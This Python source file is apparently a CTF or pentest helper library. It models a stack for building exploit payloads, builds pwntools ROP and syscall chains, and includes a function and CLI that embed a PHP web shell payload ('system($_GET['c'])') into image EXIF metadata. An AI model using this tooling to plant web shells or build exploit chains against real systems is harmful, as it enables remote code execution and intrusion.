    """Model of a stack buffer for building exploit payloads.

    `address` tracks the address just past the most recently pushed byte
    (the logical top); `buffer` holds everything pushed so far. word_size
    is in bytes (8 = 64-bit).

    NOTE(review): pack_value/unpack_value rely on p64/u64 (pwntools) being
    in scope at call time — they are not imported in this file. push_string
    relies on the module-level pad() helper.
    """
    def __init__(self, start_address, word_size=8):
        self.buffer = b""
        self.word_size = word_size
        self.address = start_address
    def push_buffer(self, data, reverse=False):
        # Append raw, word-aligned data; reverse=True flips the word order.
        data_length = len(data)
        if data_length % self.word_size != 0:
            print("[-] Cannot push uneven data to stack, got:", len(data))
            exit()
        if not reverse:
            self.buffer += data
        else:
            words = [data[i:i+self.word_size] for i in range(0, data_length, self.word_size)]
            self.buffer += b"".join(words[::-1])
        self.address += data_length
    def push_string(self, data):
        # NUL-terminate, pad to word size, push; returns the string's address.
        ptr = self.address
        data = pad(data.encode() + b"\x00", self.word_size)
        self.buffer += data
        self.address += len(data)
        return ptr
    def pop_word(self):
        # Remove and return the most recently pushed word (raw bytes).
        addr = self.buffer[-self.word_size:]
        self.buffer = self.buffer[0:-self.word_size]
        self.address -= self.word_size
        return addr
    def pack_value(self, value):
        # int -> little-endian word bytes (64-bit only so far; needs p64).
        if self.word_size == 8:
            return p64(value)
        else:
            print("Not implemented: pack_value with word size:", self.word_size)
    def unpack_value(self, value):
        # word bytes -> int (64-bit only so far; needs u64).
        if self.word_size == 8:
            return u64(value)
        else:
            print("Not implemented: unpack_value with word size:", self.word_size)
    def push_word(self, value):
        # Push one word; ints are packed first. Returns the word's address.
        ptr = self.address
        if type(value) not in [bytes, bytearray]:
            value = self.pack_value(value)
        self.buffer += value
        self.address += self.word_size
        return ptr
    def push_array(self, arr):
        # argv-style: push each string, then a NULL-terminated pointer array
        # referencing them. Returns the address of the pointer array.
        addresses = []
        for arg in arr:
            arg_addr = self.push_string(arg)
            addresses.append(arg_addr)
        addresses.append(0x0)
        ptr = self.address
        for arg_addr in addresses:
            self.push_word(arg_addr)
        return ptr
    def check_addr(self, addr, verbose=True):
        # Validate that addr lies within the pushed region [top-size, top].
        if addr > self.address:
            if verbose:
                print(f"[ ] Stack overflow: addr={hex(addr)} top={hex(self.address)}")
            return False
        elif self.address - addr > len(self.buffer):
            if verbose:
                print(f"[ ] Stack underflow: addr={hex(addr)} top={hex(self.address)} size={hex(len(self.buffer))}")
            return False
        return True
    def read_bytes(self, start_addr, end_addr):
        # check bounds
        if not self.check_addr(start_addr) or not self.check_addr(end_addr):
            return None
        elif start_addr > end_addr:
            print(f"[-] Invalid bounds start={hex(start_addr)} end={hex(end_addr)}")
            return None
        start = self.address - start_addr
        end = self.address - end_addr
        # NOTE(review): with start_addr < end_addr this computes start > end
        # and the slice is empty — confirm the intended slice direction.
        return self.buffer[start:end]
    def peek_bytes(self, n):
        # Last n pushed bytes, without removing them.
        return self.buffer[-n:]
    def peek_word(self, n = 0):
        # Word n positions below the top (0 = topmost word).
        if n == 0:
            return self.buffer[-self.word_size * (n + 1):]
        else:
            return self.buffer[-self.word_size * (n + 1):-self.word_size * n]
    def print(self):
        # Dump the stack word by word, topmost first, with its address.
        for offset in range(0, len(self.buffer) // self.word_size):
            hex_bytes = self.peek_word(offset).hex(" ")
            addr = self.address - offset * self.word_size
            print(f"\t{hex(addr)}\t{hex_bytes}")
def setRegisters(elf, registers):
    """Build a pwntools ROP chain loading `registers` ({name: value}).

    Gadgets that clobber additional registers get those slots padded
    with 0. Returns the ROP object.
    """
    from pwn import ROP
    import pwnlib.rop.gadgets  # BUGFIX: 'pwnlib' was referenced below but never imported
    rop = ROP(elf)
    for value, gadget in rop.setRegisters(registers):
        if isinstance(gadget, pwnlib.rop.gadgets.Gadget):
            rop.raw(gadget.address)
            for reg in gadget.regs:
                # Requested registers get their value, incidental ones 0.
                rop.raw(registers.get(reg, 0))
    return rop
def genSyscall(elf, syscall, registers):
    """Extend setRegisters() into a full syscall ROP chain.

    Sets rax to the syscall number, then appends the architecture's
    syscall gadget ("syscall" on amd64, "int 0x80" otherwise).
    """
    registers["rax"] = syscall
    chain = setRegisters(elf, registers)
    gadget = "syscall" if elf.arch == "amd64" else "int 0x80"
    chain.raw(chain.find_gadget([gadget]).address)
    return chain
def lpad(x, n, b=b"\x00"):
    """Left-pad `x` with `b` up to the next multiple of `n` (see pad())."""
    return pad(x, n, b, "l")
def rpad(x, n, b=b"\x00"):
    """Right-pad `x` with `b` up to the next multiple of `n` (see pad())."""
    return pad(x, n, b, "r")
def pad(x, n, b=b"\x00", s="r"):
    """Pad `x` with `b` up to the next multiple of `n`.

    s="r" appends (right pad), s="l" prepends (left pad); already-aligned
    input — or an unrecognized side — is returned unchanged.
    """
    remainder = len(x) % n
    if remainder == 0:
        return x
    fill = b * (n - remainder)
    if s == "r":
        return x + fill
    if s == "l":
        return fill + x
    return x
def xor(a, b, *args):
    """XOR two (or more) values byte-wise / char-wise.

    `a` and `b` may each be str, bytes/bytearray or int; the shorter
    operand is cycled to the longer one's length. str XOR str returns
    str (and ignores extra args, as before); everything else returns
    bytes with extra args folded in left to right.
    """
    if isinstance(a, int):
        # BUGFIX: the old ceil(log2(a)/8) sizing crashed for 0 (log(0))
        # and under-sized exact powers of 256 (OverflowError in to_bytes);
        # bit_length is exact, with 0 still encoded as one byte.
        a = a.to_bytes(max(1, (a.bit_length() + 7) // 8), "big")
    if isinstance(b, int):
        b = b.to_bytes(max(1, (b.bit_length() + 7) // 8), "big")
    if len(a) == 0 or len(b) == 0:
        return a
    # Cycle the shorter operand up to the longer one's length.
    if len(a) < len(b):
        a *= int(math.ceil((len(b)/len(a))))
        a = a[0:len(b)]
    elif len(b) < len(a):
        b *= int(math.ceil((len(a)/len(b))))
        b = b[0:len(a)]
    if type(a) == str and type(b) == str:
        return "".join([chr(ord(c1) ^ ord(c2)) for (c1, c2) in zip(a, b)])
    if type(a) not in (bytes, bytearray):
        a = a.encode()
    if type(b) not in (bytes, bytearray):
        b = b.encode()
    result = bytes(c1 ^ c2 for c1, c2 in zip(a, b))
    if args:
        result = xor(result, *args)
    return result
def base64urldecode(data):
    """Decode URL-safe base64, tolerating URL-quoting and stripped '=' padding."""
    if isinstance(data, str):
        data = urllib.parse.unquote(data).encode()
    missing = len(data) % 4
    if missing:
        data += b"=" * (4 - missing)
    return base64.urlsafe_b64decode(data)
def base64urlencode(data, strip_padding=True):
    """Encode to URL-safe base64 (bytes); '=' padding is stripped by default."""
    raw = data.encode() if isinstance(data, str) else data
    out = base64.urlsafe_b64encode(raw)
    return out.rstrip(b"=") if strip_padding else out
def set_exif_data(payload="<?php system($_GET['c']);?>", _in=None, _out=None, exif_tag=None, _format=None):
    """Embed `payload` into an image's EXIF metadata (payload smuggling).

    :param payload: string written into the chosen EXIF tag(s).
    :param _in: input image — a path, a PIL Image, an exif.Image, or None
        (a blank 50x50 white RGB image is created).
    :param _out: None to return the resulting bytes, a path to write to,
        or any object with a write() method.
    :param exif_tag: a tag name, "all" to try every known tag, or None to
        use image_description.
    :param _format: forced image format when re-encoding a PIL Image.
    """
    import exif
    from PIL import Image
    # No usable input -> start from a fresh blank image.
    if _in is None or (isinstance(_in, str) and not os.path.exists(_in)):
        _in = Image.new("RGB", (50,50), (255,255,255))
    if isinstance(_in, str):
        with open(_in, "rb") as f:
            _in = exif.Image(f)
    elif isinstance(_in, Image.Image):
        # Re-encode the PIL image so the exif library can parse it.
        bytes = io.BytesIO()  # NOTE(review): shadows the builtin 'bytes'
        format = _format
        if format is None:
            format = _in.format
        if format is None:
            print("Image format not specified, use PNG/JPG/...")
            exit()
        elif format == "PNG":
            print("Image PNG not supported yet :/")
            exit()
        _in.save(bytes, format=format)
        print(bytes)
        _in = exif.Image(bytes.getvalue())
    elif not isinstance(_in, exif.Image):
        print("Invalid input. Either give an Image or a path to an image.")
        exit()
    valid_tags = list(exif._constants.ATTRIBUTE_NAME_MAP.values())
    if exif_tag is None:
        _in.image_description = payload
    elif exif_tag == "all":
        # Best effort: try every known tag, skipping ones that reject the value.
        for exif_tag in valid_tags:
            try:
                print("Setting exif tag:", exif_tag)
                _in.set(exif_tag, payload)
            except Exception as e:
                print("Error setting exif tag:", exif_tag, str(e))
                pass
    else:
        if exif_tag not in valid_tags:
            print("Invalid exif-tag. Choose one of the following:")
            print(", ".join(valid_tags))
            exit()
        _in.set(exif_tag, payload)
    # Emit: return bytes, write to a path, or write to a file-like object.
    if _out is None:
        return _in.get_file()
    elif isinstance(_out, str):
        with open(_out, "wb") as f:
            f.write(_in.get_file())
    elif hasattr(_out, "write"):
        _out.write(_in.get_file())
    else:
        print("Invalid output argument.")
def human_readable_size(value):
    """Format a byte count with binary (1024-based) suffixes, capped at TiB."""
    suffixes = ["B", "KiB", "MiB", "GiB", "TiB"]
    index = 0
    while value >= 1024 and index < len(suffixes) - 1:
        value /= 1024.0
        index += 1
    return "%.2f %s" % (value, suffixes[index])
class CaseInsensitiveDict(dict):
    """Basic case-insensitive dict with strings-only keys.

    `proxy` maps each lowercased key to the originally-cased key that is
    actually stored in the underlying dict.
    """
    # BUGFIX: 'proxy' used to be a shared class-level dict, a mutable
    # default that could leak state between instances; it is now always
    # created per instance in __init__.
    def __init__(self, data=None):
        super().__init__()
        self.proxy = dict()
        if data:
            for k in data:
                # __setitem__ keeps proxy in sync
                self[k] = data[k]
    def __contains__(self, k):
        return k.lower() in self.proxy
    def __delitem__(self, k):
        key = self.proxy[k.lower()]
        super().__delitem__(key)
        del self.proxy[k.lower()]
    def __getitem__(self, k):
        key = self.proxy[k.lower()]
        return super().__getitem__(key)
    def get(self, k, default=None):
        return self[k] if k in self else default
    def __setitem__(self, k, v):
        super().__setitem__(k, v)
        self.proxy[k.lower()] = k
    @staticmethod
    def build(labels, data):
        """Zip parallel label/value sequences into a CaseInsensitiveDict."""
        row = CaseInsensitiveDict()
        for key, val in zip(labels, data):
            row[key] = val
        return row
if __name__ == "__main__":
    # Small CLI wrapper around a few helpers in this module.
    bin = sys.argv[0]
    if len(sys.argv) < 2:
        print("Usage: %s [command]" % bin)
        exit(1)
    command = sys.argv[1]
    if command == "getAddress":
        if len(sys.argv) >= 3:
            print(get_address(sys.argv[2]))
        else:
            print(get_address())
    elif command == "pad":
        if len(sys.argv) >= 3:
            n = 8
            if len(sys.argv) >= 4:
                n = int(sys.argv[3])
            print(pad(sys.argv[2].encode(), n))
        else:
            print("Usage: %s pad <str> [n=8]" % bin)
    elif command == "exifImage":
        if len(sys.argv) < 4:
            print("Usage: %s exifImage <file> <payload> [tag]" % bin)
        else:
            _in = sys.argv[2]
            payload = sys.argv[3]
            if payload == "-":
                # BUGFIX: readlines() returned a list of lines where
                # set_exif_data expects a single payload string.
                payload = sys.stdin.read()
            tag = None if len(sys.argv) < 5 else sys.argv[4]
            # Derive output name: insert "_exif" before the extension.
            parts = _in.split(".")
            if len(parts) == 1:
                _out = _in + "_exif"
            else:
                _out = ".".join(parts[0:-1]) + "_exif." + parts[-1]
            set_exif_data(payload, _in, _out, tag)
    else:
        print("Usage: %s [command]" % bin)
        print("Available commands:")
        print(" help, getAddress, pad, exifImage")